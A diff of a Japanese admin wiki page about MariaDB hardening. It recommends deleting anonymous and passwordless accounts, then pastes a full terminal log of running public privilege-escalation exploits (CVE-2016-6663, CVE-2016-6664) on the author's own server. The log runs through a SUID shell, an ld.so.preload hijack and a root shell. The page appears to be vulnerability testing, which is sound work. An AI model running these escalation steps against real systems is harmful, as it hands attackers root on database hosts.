2: 2016-11-11 (金) 11:48:56 iseki  |
現: 2016-11-11 (金) 15:46:20 iseki |
| | **** デフォルトユーザ [#c3c58224] | | **** デフォルトユーザ [#c3c58224] |
| | - パスワードなし,ユーザ名なしのデータはインストール時に削除すべき. | | - パスワードなし,ユーザ名なしのデータはインストール時に削除すべき. |
| | + | |
| | + | MariaDB [(none)]> use mysql; |
| | MariaDB [mysql]> select Host,User,Password from user; | | MariaDB [mysql]> select Host,User,Password from user; |
| | +-----------+------+-------------------------------------------+ | | +-----------+------+-------------------------------------------+ |
| | | rigel-b | | | | | | rigel-b | | | |
| | +-----------+------+-------------------------------------------+ | | +-----------+------+-------------------------------------------+ |
| | + | |
| | + | - 以下のコマンドで削除しておく |
| | + | |
| | + | MariaDB [(none)]> use mysql; |
| | + | MariaDB [mysql]> delete from user where user=''; |
| | + | MariaDB [mysql]> delete from user where password=''; |
| | | | |
| | **** mysql ユーザアカウントのダッシュ [#z9d7510f] | | **** mysql ユーザアカウントのダッシュ [#z9d7510f] |
| | | | |
| | [iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localhost test | | [iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localhost test |
| | + | |
| | MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit | | MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit |
| | mysql-privesc-race.c (ver. 1.0) | | mysql-privesc-race.c (ver. 1.0) |
| | + | |
| | CVE-2016-6663 / CVE-2016-5616 | | CVE-2016-6663 / CVE-2016-5616 |
| | + | |
| | For testing purposes only. Do no harm. | | For testing purposes only. Do no harm. |
| | + | |
| | Discovered/Coded by: | | Discovered/Coded by: |
| | + | |
| | Dawid Golunski | | Dawid Golunski |
| | http://legalhackers.com | | http://legalhackers.com |
| - | | + | |
| | + | |
| | [+] Starting the exploit as: | | [+] Starting the exploit as: |
| | uid=502(iseki) gid=100(users) 所属グループ=100(users) | | uid=502(iseki) gid=100(users) 所属グループ=100(users) |
| | + | |
| | [+] Connecting to the database `test` as @localhost | | [+] Connecting to the database `test` as @localhost |
| | + | |
| | [+] Creating exploit temp directory /tmp/mysql_privesc_exploit | | [+] Creating exploit temp directory /tmp/mysql_privesc_exploit |
| | + | |
| | [+] Creating mysql tables | | [+] Creating mysql tables |
| | + | |
| | DROP TABLE IF EXISTS exploit_table | | DROP TABLE IF EXISTS exploit_table |
| | DROP TABLE IF EXISTS mysql_suid_shell | | DROP TABLE IF EXISTS mysql_suid_shell |
| | CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' | | CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' |
| | CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' | | CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' |
| | + | |
| | [+] Copying bash into the mysql_suid_shell table. | | [+] Copying bash into the mysql_suid_shell table. |
| | After the exploitation the following file/table will be assigned SUID and executable bits : | | After the exploitation the following file/table will be assigned SUID and executable bits : |
| | -rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD | | -rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD |
| | + | |
| | [+] Entering the race loop... Hang in there... | | [+] Entering the race loop... Hang in there... |
| | ->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> | | ->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> |
| | + | |
| | [+] Bingo! Race won (took 12874 tries) ! Check out the mysql SUID shell: | | [+] Bingo! Race won (took 12874 tries) ! Check out the mysql SUID shell: |
| | + | |
| | -rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD | | -rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD |
| | + | |
| | [+] Spawning the mysql SUID shell now... | | [+] Spawning the mysql SUID shell now... |
| | Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :) | | Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :) |
| | + | |
| | mysql_suid_shell.MYD-4.1$ whoami | | mysql_suid_shell.MYD-4.1$ whoami |
| | mysql | | mysql |
| | | | |
| | mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/rigel-b.err | | mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/rigel-b.err |
| | + | |
| | MySQL / MariaDB / Percona - Root Privilege Escalation PoC Exploit | | MySQL / MariaDB / Percona - Root Privilege Escalation PoC Exploit |
| | mysql-chowned.sh (ver. 1.0) | | mysql-chowned.sh (ver. 1.0) |
| | + | |
| | CVE-2016-6664 / CVE-2016-5617 | | CVE-2016-6664 / CVE-2016-5617 |
| | + | |
| | Discovered and coded by: | | Discovered and coded by: |
| | + | |
| | Dawid Golunski | | Dawid Golunski |
| | http://legalhackers.com | | http://legalhackers.com |
| | + | |
| | [+] Starting the exploit as | | [+] Starting the exploit as |
| | uid=502(iseki) gid=100(users) euid=103(mysql) 所属グループ=100(users) | | uid=502(iseki) gid=100(users) euid=103(mysql) 所属グループ=100(users) |
| | + | |
| | [+] Target MySQL log file set to /var/mysql/rigel-b.err | | [+] Target MySQL log file set to /var/mysql/rigel-b.err |
| | + | |
| | [+] Compiling the privesc shared library (/tmp/privesclib.c) | | [+] Compiling the privesc shared library (/tmp/privesclib.c) |
| | + | |
| | [+] Backdoor/low-priv shell installed at: | | [+] Backdoor/low-priv shell installed at: |
| | -rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/mysqlrootsh | | -rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/mysqlrootsh |
| | + | |
| | [+] Symlink created at: | | [+] Symlink created at: |
| | lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysql/rigel-b.err -> /etc/ld.so.preload | | lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysql/rigel-b.err -> /etc/ld.so.preload |
| | + | |
| | [+] Waiting for MySQL to re-open the logs/MySQL service restart... | | [+] Waiting for MySQL to re-open the logs/MySQL service restart... |
| | + | |
| | [+] Waiting for MySQL to re-open the logs/MySQL service restart... | | [+] Waiting for MySQL to re-open the logs/MySQL service restart... |
| | ./mysql-chowned.sh: line 153: pidof: コマンドが見つかりません | | ./mysql-chowned.sh: line 153: pidof: コマンドが見つかりません |
| | Do you want to kill mysqld process to instantly get root? :) ? [y/n] y | | Do you want to kill mysqld process to instantly get root? :) ? [y/n] y |
| | Got it. Executing 'killall mysqld' now... | | Got it. Executing 'killall mysqld' now... |
| | + | |
| | [+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: | | [+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: |
| | -rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so.preload | | -rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so.preload |
| | + | |
| | [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload | | [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload |
| | + | |
| | [+] The /etc/ld.so.preload file now contains: | | [+] The /etc/ld.so.preload file now contains: |
| | /tmp/privesclib.so | | /tmp/privesclib.so |
| | + | |
| | [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! | | [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! |
| | -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh | | -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh |
| | + | |
| | [+] Rootshell got assigned root SUID perms at: | | [+] Rootshell got assigned root SUID perms at: |
| | -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh | | -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh |
| | + | |
| | Got root! The database server has been ch-OWNED ! | | Got root! The database server has been ch-OWNED ! |
| | + | |
| | [+] Spawning the rootshell /tmp/mysqlrootsh now! | | [+] Spawning the rootshell /tmp/mysqlrootsh now! |
| | + | |
| | mysqlrootsh-4.1# whoami | | mysqlrootsh-4.1# whoami |
| | root | | root |
